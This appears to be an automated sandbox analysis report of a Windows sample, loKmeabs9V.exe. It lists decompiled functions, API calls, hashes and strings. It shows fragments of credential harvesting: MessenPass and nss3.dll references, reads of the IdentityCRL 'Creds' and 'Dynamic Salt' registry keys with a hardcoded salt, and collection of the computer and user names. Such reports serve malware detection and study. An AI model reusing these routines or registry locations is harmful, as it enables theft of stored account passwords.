                                • Instruction ID: c142bb7588fded06bca0c3959130fc7bc280b220a29219a6f5312b9b0058b910
                                • Opcode Fuzzy Hash: a1f73f7abb57728e4712774607e4362808b5bed289a3dcc15fc17451e6932546
                                • Instruction Fuzzy Hash: 180120769081146AD721BA699C42BDA779C4F21709F2404BBF5C4F31C2EEB859C543BD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040623F, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscpy
                                • String ID:
                                • API String ID: 714388716-0
                                • Opcode ID: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
                                • Instruction ID: dce8e19ef7dbf3e453dc58d21b67a2b53133f69bc0796553bf20bccd0e5dc17f
                                • Opcode Fuzzy Hash: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
                                • Instruction Fuzzy Hash: 310144769002089BCB22EBA5DC85EDB77BCAF88305F0004ABF54797141EF38A7C48B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B15B, Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 74%
                                			E0040B15B(void* __esi) {
				void* _v260;
				char _v516;
				void* __ebx;
				long _t16;
				signed short _t24;
				signed short _t26;
				void* _t27;

				_t27 = __esi;
				_push(E00409445( *((intOrPtr*)(__esi + 0x390))));
				_t24 = 4;
				sprintf( &_v260, E0040876F(_t24));
				_t16 = E004099DC( *((intOrPtr*)(__esi + 0x390)), 0);
				if(_t16 > 0) {
					_t26 = 5;
					sprintf( &_v516, E0040876F(_t26));
					_t16 =  &_v260;
					0x413cf4(_t16,  &_v516, _t16);
				}
				if( *((intOrPtr*)(_t27 + 0x108)) != 0) {
					return SendMessageA( *(_t27 + 0x114), 0x401, 0,  &_v260);
				}
				return _t16;
			}










                                0x0040b15b
                                0x0040b170
                                0x0040b173
                                0x0040b181
                                0x0040b191
                                0x0040b198
                                0x0040b19d
                                0x0040b1ab
                                0x0040b1b7
                                0x0040b1be
                                0x0040b1c3
                                0x0040b1ce
                                0x00000000
                                0x0040b1e4
                                0x0040b1eb

                                APIs
                                  • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,00000FFF,?), ref: 00408838
                                  • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                • sprintf.MSVCRT ref: 0040B181
                                • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B1E4
                                  • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                  • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                • sprintf.MSVCRT ref: 0040B1AB
                                • _mbscat.MSVCRT ref: 0040B1BE
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                • String ID:
                                • API String ID: 203655857-0
                                • Opcode ID: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
                                • Instruction ID: ecab945e31bd422c391273073b57af520698e657e98585e8788b6dab187b6cf3
                                • Opcode Fuzzy Hash: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
                                • Instruction Fuzzy Hash: 0E0167B25003046AD721B775DC86FEB73AC6B04704F14046FB655B6182EA79EA848A68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00405E4A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E00405E4A(char* _a4) {
				void _v267;
				char _v268;
				int _t12;
				signed int _t16;

				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t12 = strlen(_a4);
				_t5 = strlen(0x418198) + 1; // 0x1
				if(_t12 + _t5 >= 0x104) {
					_v268 = 0;
				} else {
					E00406B4B( &_v268, _a4, 0x418198);
				}
				_t16 = E004069D3( &_v268);
				asm("sbb eax, eax");
				return  ~( ~_t16);
			}







                                0x00405e65
                                0x00405e6c
                                0x00405e74
                                0x00405e86
                                0x00405e8f
                                0x00405ea4
                                0x00405e91
                                0x00405e9b
                                0x00405ea1
                                0x00405eb2
                                0x00405ebb
                                0x00405ec2

                                APIs
                                • memset.MSVCRT ref: 00405E6C
                                • strlen.MSVCRT ref: 00405E74
                                • strlen.MSVCRT ref: 00405E81
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$_mbscat_mbscpymemset
                                • String ID: nss3.dll
                                • API String ID: 581844971-2492180550
                                • Opcode ID: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
                                • Instruction ID: 0509c7bfbc4d162460136cac1117631891986418d94c1b22c83112455de3b5d3
                                • Opcode Fuzzy Hash: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
                                • Instruction Fuzzy Hash: 44F0CD7140C1186BDB10E769DC45FDA7BAC8F61719F1000B7F589E60C1DAB8ABC546A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A6B4, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E0040A6B4(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t15;
				intOrPtr* _t24;
				char* _t26;

				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
				_t26 =  &_v260;
				E00409DD6(_t26, _t15);
				_push(_t26);
				sprintf( &_v516, "</%s>");
				return E004067EC(_a4,  &_v516);
			}











                                0x0040a6ce
                                0x0040a6d0
                                0x0040a6d7
                                0x0040a6e6
                                0x0040a6ed
                                0x0040a6f9
                                0x0040a6fd
                                0x0040a703
                                0x0040a70a
                                0x0040a717
                                0x0040a731

                                APIs
                                • memset.MSVCRT ref: 0040A6D7
                                • memset.MSVCRT ref: 0040A6ED
                                  • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                  • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                • sprintf.MSVCRT ref: 0040A717
                                  • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                  • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                • String ID: </%s>
                                • API String ID: 3699762281-259020660
                                • Opcode ID: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
                                • Instruction ID: 76c63a3487c2ea4e5ea40729799977580a4d7530bed5194a5a383ad1b54ece87
                                • Opcode Fuzzy Hash: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
                                • Instruction Fuzzy Hash: EB01F97290012977D720A719CC46FDE7B6CAF55705F0400FAB50DF3142EA749B848BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040783B, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 35stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0040783B(void* __eax, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t10;
				int _t11;
				char* _t13;
				char* _t18;
				void* _t19;
				void* _t23;

				_t19 = __eax;
				E00407930(__eax);
				_t1 = _t23 + 0x14; // 0x4042e3
				_t2 = _t19 + 0x3cc; // 0x4cb
				_t18 = _t2;
				E00406958(0x143, _t18,  *_t1);
				 *((intOrPtr*)(_t23 + 0x1c)) = _t19 + 4;
				_t10 = strlen(_t18);
				_t11 = strlen(0x417f90);
				_t13 =  *((intOrPtr*)(_t23 + 0x20));
				if(_t11 + _t10 + 1 >= 0x143) {
					 *_t13 = 0;
					return _t13;
				}
				return E00406B4B(_t13, _t18, 0x417f90);
			}












                                0x0040783f
                                0x00407841
                                0x00407846
                                0x0040784a
                                0x0040784a
                                0x00407855
                                0x0040785e
                                0x00407862
                                0x0040786f
                                0x0040787d
                                0x00407881
                                0x0040788e
                                0x00000000
                                0x0040788e
                                0x00000000

                                APIs
                                  • Part of subcall function 00407930: FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                  • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                  • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                • strlen.MSVCRT ref: 00407862
                                • strlen.MSVCRT ref: 0040786F
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$CloseFind_mbscat_mbscpymemcpy
                                • String ID: *.*$B@
                                • API String ID: 470300861-2086290067
                                • Opcode ID: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
                                • Instruction ID: 1d68107b6d1fc83258085f2e46244374cde2cc5f318db11bb1f65da7a858b60d
                                • Opcode Fuzzy Hash: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
                                • Instruction Fuzzy Hash: C7F0E972D082166FD200AA66984599BBB9C8F52729F11443FF808B7142D63D6D0643AF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411F43, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,00411FF1), ref: 00411F53
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00411FB7
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: ntdll.dll
                                • API String ID: 2574300362-2227199552
                                • Opcode ID: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
                                • Instruction ID: c3f2c9e477f8672f67090740fae2e549de1e6c2fb6487af2d15ed3ca5984443d
                                • Opcode Fuzzy Hash: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
                                • Instruction Fuzzy Hash: DC110D20D0C6C9EDEB12C7ACC4087DEBEF55B16709F0880E8C585A6292C7BA5658C776
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040923A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0040923A(void** __esi, struct HWND__* _a4) {
				long _v8;
				signed int _v20;
				signed int _v24;
				short _v28;
				void* _v36;
				void* _t17;
				long _t22;
				short* _t25;
				int _t27;
				void** _t28;

				_t28 = __esi;
				_t27 = 0;
				if(_a4 != 0) {
					_t17 = memset( *__esi, 0, __esi[1] << 2);
					if(__esi[1] > 0) {
						do {
							_v24 = _v24 & 0x00000000;
							_v20 = _v20 & 0x00000000;
							_t25 =  *_t28 + _t27 * 4;
							_v36 = 0x22;
							_t22 = SendMessageA(_a4, 0x1019, _t27,  &_v36);
							if(_t22 != 0) {
								 *_t25 = _v28;
								_t22 = _v8;
								 *(_t25 + 2) = _t22;
							}
							_t27 = _t27 + 1;
						} while (_t27 < _t28[1]);
						return _t22;
					}
				}
				return _t17;
			}













                                0x0040923a
                                0x00409241
                                0x00409246
                                0x00409252
                                0x0040925d
                                0x00409260
                                0x00409262
                                0x00409266
                                0x0040926a
                                0x0040927a
                                0x00409281
                                0x00409289
                                0x0040928f
                                0x00409292
                                0x00409296
                                0x00409296
                                0x0040929a
                                0x0040929b
                                0x00000000
                                0x004092a0
                                0x0040925d
                                0x004092a3

                                APIs
                                • memset.MSVCRT ref: 00409252
                                • SendMessageA.USER32(?,00001019,00000000,?), ref: 00409281
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: MessageSendmemset
                                • String ID: "
                                • API String ID: 568519121-123907689
                                • Opcode ID: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
                                • Instruction ID: 143eebe103db385490b988b1a572ada648b34fe061aa254f91e3f3e50342256c
                                • Opcode Fuzzy Hash: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
                                • Instruction Fuzzy Hash: 0A01A275800205FBDB218F95C845AAFB7B8FF84B59F00842DE854A6281E3349945CB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C3AF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0040C3AF(void* __esi) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t15;
				struct HWND__* _t21;

				_t15 =  *0x41dbd4; // 0x400000
				_v44.hInstance = _t15;
				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
				_v44.lpszClassName = __esi + 4;
				_v44.style = 0;
				_v44.lpfnWndProc = E00402CAC;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassA( &_v44);
				_t21 = CreateWindowExA(0, 0x415454, 0x415454, 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x41dbd4, __esi);
				 *(__esi + 0x108) = _t21;
				return _t21;
			}






                                0x0040c3b5
                                0x0040c3ba
                                0x0040c3c3
                                0x0040c3cc
                                0x0040c3d3
                                0x0040c3d6
                                0x0040c3dd
                                0x0040c3e0
                                0x0040c3e3
                                0x0040c3e6
                                0x0040c3ed
                                0x0040c3f0
                                0x0040c418
                                0x0040c41e
                                0x0040c426

                                APIs
                                • RegisterClassA.USER32(?), ref: 0040C3F0
                                • CreateWindowExA.USER32(00000000,MessenPass,MessenPass,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000), ref: 0040C418
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ClassCreateRegisterWindow
                                • String ID: MessenPass
                                • API String ID: 3469048531-1347981195
                                • Opcode ID: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
                                • Instruction ID: df568ce2afab08691587747be1d5034a2dd7dfffecd18501b630fd2d0d2d029c
                                • Opcode Fuzzy Hash: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
                                • Instruction Fuzzy Hash: 0701E8B5D00608AFDB11CF9ACD49ADFFFF8EB89704F10802BE541A6250D7B46640CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408A29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                Download Yara Rule
                                APIs
                                • LoadMenuA.USER32(00000000), ref: 00408A31
                                • sprintf.MSVCRT ref: 00408A54
                                  • Part of subcall function 004088D4: GetMenuItemCount.USER32(?), ref: 004088EA
                                  • Part of subcall function 004088D4: memset.MSVCRT ref: 0040890E
                                  • Part of subcall function 004088D4: GetMenuItemInfoA.USER32(?), ref: 00408944
                                  • Part of subcall function 004088D4: memset.MSVCRT ref: 00408971
                                  • Part of subcall function 004088D4: strchr.MSVCRT ref: 0040897D
                                  • Part of subcall function 004088D4: _mbscat.MSVCRT ref: 004089D8
                                  • Part of subcall function 004088D4: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 004089F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                • String ID: menu_%d
                                • API String ID: 1129539653-2417748251
                                • Opcode ID: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
                                • Instruction ID: 6e6fd20b795a8bab19114a67d1783e5b01d02cb8a2ade4a69635827cbafc1364
                                • Opcode Fuzzy Hash: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
                                • Instruction Fuzzy Hash: EBD0C232A0030076E61033276C0EFCB29195BD2B19F54807FF400710C5DEBD018487AC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409141, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E00409141(char* __esi) {
				char* _t2;
				char* _t5;

				_t5 = __esi;
				E004069E8(__esi);
				_t2 = strrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 = 0;
				}
				0x413cf4(_t5, "_lng.ini");
				return _t2;
			}





                                0x00409141
                                0x00409142
                                0x0040914a
                                0x00409154
                                0x00409156
                                0x00409156
                                0x0040915f
                                0x00409166

                                APIs
                                  • Part of subcall function 004069E8: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409147,00000000,0040905A,?,00000000,00000104), ref: 004069F3
                                • strrchr.MSVCRT ref: 0040914A
                                • _mbscat.MSVCRT ref: 0040915F
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileModuleName_mbscatstrrchr
                                • String ID: _lng.ini
                                • API String ID: 3334749609-1948609170
                                • Opcode ID: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
                                • Instruction ID: a8986b5d0fc5065fa4420194992ab4643f38d39362f1d3b193e5f677e6d35072
                                • Opcode Fuzzy Hash: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
                                • Instruction Fuzzy Hash: D7C0127124565054E11231222D03BCB05480F12705F29006FFC01781C3EE5D4A9180AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406DA8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E00406DA8(struct HWND__* _a4) {
				signed int _t5;

				_t5 = SetWindowLongA(_a4, 0xffffffec, GetWindowLongA(_a4, 0xffffffec) | 0x00400000);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}




                                0x00406dc0
                                0x00406dc8
                                0x00406dcc

                                APIs
                                • GetWindowLongA.USER32(?,000000EC), ref: 00406DAE
                                • SetWindowLongA.USER32(000000EC,000000EC,00000000), ref: 00406DC0
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: LongWindow
                                • String ID: MZ@
                                • API String ID: 1378638983-2978689999
                                • Opcode ID: d2a461ae841fa0dde44b9faf912a436fc80ff43710132b853de9347092c42cfe
                                • Instruction ID: afbc625c57fd7c5c64aba701cafa3846435a0d62a4f17ca64e8d7e2a082489bd
                                • Opcode Fuzzy Hash: d2a461ae841fa0dde44b9faf912a436fc80ff43710132b853de9347092c42cfe
                                • Instruction Fuzzy Hash: ADC002711AC516ABDF112B64EC49EAB7EA9ABC1322F208B74B066E50F1CB318450DA59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407E33, Relevance: 5.1, APIs: 4, Instructions: 108stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 86%
                                			E00407E33(intOrPtr* _a4, intOrPtr _a8, char* _a12) {
				int _v12;
				int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v36;
				signed int* _v40;
				char _v44;
				void _v304;
				char _v560;
				void _v2607;
				char _v2608;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				signed int _t40;
				signed int _t44;
				signed int* _t64;
				char _t72;
				signed int _t77;
				char* _t78;
				void* _t81;
				void* _t82;
				int _t84;
				char* _t86;
				void* _t88;
				signed int _t93;

				_t39 = strlen(_a12);
				_t77 = _t39;
				_t40 = _t39 & 0x80000001;
				if(_t40 < 0) {
					_t40 = (_t40 - 0x00000001 | 0xfffffffe) + 1;
					_t93 = _t40;
				}
				if(_t93 != 0 || _t77 <= 0x20) {
					return _t40;
				} else {
					_t82 = 0;
					_v2608 = 0;
					memset( &_v2607, 0, 0x7ff);
					_t64 = _a4 + 4;
					_t44 =  *_t64 | 0x00000001;
					_v12 = 0;
					if(_t77 <= 4) {
						L8:
						_v28 = _t82;
						_v20 = _t82;
						_v24 = _t82;
						if(E00404C9D( &_v28, 0) != 0) {
							_v36 = _v12;
							_v32 =  &_v2608;
							_v44 = 0x10;
							_v40 = _t64;
							if(E00404CF5( &_v28,  &_v36,  &_v44,  &_v16) != 0) {
								_t84 = _v16;
								if(_t84 > 0xff) {
									_t84 = 0xff;
								}
								_v560 = 0;
								_v304 = 0;
								memcpy( &_v304, _v12, _t84);
								_t78 =  &_v560;
								 *((char*)(_t88 + _t84 - 0x12c)) = 0;
								E00406958(0xff, _t78, _a8);
								 *((intOrPtr*)( *_a4))(_t78);
								LocalFree(_v12);
							}
						}
						return E00404CE0( &_v28);
					}
					_t86 =  &(_a12[5]);
					_t81 = (_t77 + 0xfffffffb >> 1) + 1;
					do {
						_t72 = ( *((intOrPtr*)(_t86 - 1)) - 0x00000001 << 0x00000004 |  *_t86 - 0x00000021) - _t44;
						_t44 = _t44 * 0x10ff5;
						_t86 =  &(_t86[2]);
						_v12 = _v12 + 1;
						_t81 = _t81 - 1;
						 *((char*)(_t88 + _v12 - 0xa2c)) = _t72;
					} while (_t81 != 0);
					_t82 = 0;
					goto L8;
				}
			}
































                                0x00407e42
                                0x00407e47
                                0x00407e49
                                0x00407e4f
                                0x00407e55
                                0x00407e55
                                0x00407e55
                                0x00407e56
                                0x00407f7b
                                0x00407e65
                                0x00407e6a
                                0x00407e74
                                0x00407e7b
                                0x00407e83
                                0x00407e8b
                                0x00407e91
                                0x00407e94
                                0x00407ecd
                                0x00407ed0
                                0x00407ed3
                                0x00407ed6
                                0x00407ee0
                                0x00407ee9
                                0x00407ef2
                                0x00407f04
                                0x00407f0b
                                0x00407f15
                                0x00407f17
                                0x00407f21
                                0x00407f23
                                0x00407f23
                                0x00407f30
                                0x00407f37
                                0x00407f3e
                                0x00407f46
                                0x00407f4c
                                0x00407f54
                                0x00407f64
                                0x00407f69
                                0x00407f69
                                0x00407f15
                                0x00000000
                                0x00407f72
                                0x00407e9e
                                0x00407ea1
                                0x00407ea2
                                0x00407eb4
                                0x00407eb6
                                0x00407ebd
                                0x00407ebe
                                0x00407ec1
                                0x00407ec2
                                0x00407ec2
                                0x00407ecb
                                0x00000000
                                0x00407ecb

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeLocalmemcpymemsetstrlen
                                • String ID:
                                • API String ID: 3110682361-0
                                • Opcode ID: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
                                • Instruction ID: 94145ba3e6d447937b4e48053a9a2b44a3b831c7855691199b8e714b6b5b9eaf
                                • Opcode Fuzzy Hash: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
                                • Instruction Fuzzy Hash: 9941C372D041199BCF109FA9C841BDEBFB8EF49314F1041B6E955B7281C238AA85CFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004092CC, Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@$memset
                                • String ID:
                                • API String ID: 1860491036-0
                                • Opcode ID: 1bad524f509e8432f6dffaaf9df71c7c9054cf9a40cbc24d5c758d582a256a45
                                • Instruction ID: 542bc7e3926c6d60784d6f8799ebb0262de6c8f0aff60c73b96b1684488c9edf
                                • Opcode Fuzzy Hash: 1bad524f509e8432f6dffaaf9df71c7c9054cf9a40cbc24d5c758d582a256a45
                                • Instruction Fuzzy Hash: 9621B3B0A053008FDB558F6A9845955FBF8FF94311B2AC9AFD508DB2B2D7B8C9409F14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: loKmeabs9V.exe PID: 4112 Parent PID: 476 loKmeabs9V.exeCOMMON

                                Executed Functions

                                Function 00408043, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004080A5
                                • memset.MSVCRT ref: 004080B9
                                • memset.MSVCRT ref: 004080D3
                                • memset.MSVCRT ref: 004080E8
                                • GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                • GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                • strlen.MSVCRT ref: 0040815B
                                • strlen.MSVCRT ref: 0040816A
                                • memcpy.MSVCRT ref: 0040817C
                                Strings
                                Memory Dump Source
                                • Source File: 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000018.00000002.471664194.000000000044F000.00000040.00000001.sdmp Download File
                                • Associated: 00000018.00000002.471679863.0000000000452000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                • String ID: 5$H$O$b$i$}$}
                                • API String ID: 1832431107-3760989150
                                • Opcode ID: 282d28ced94b0fcaa9e4670a9559102abf7cd8878a85da3a2d842f9bb15e03e3
                                • Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
                                • Opcode Fuzzy Hash: 282d28ced94b0fcaa9e4670a9559102abf7cd8878a85da3a2d842f9bb15e03e3
                                • Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F478, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
                                  • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                  • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                • memcpy.MSVCRT ref: 0040F55C
                                • memcpy.MSVCRT ref: 0040F571
                                  • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                  • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
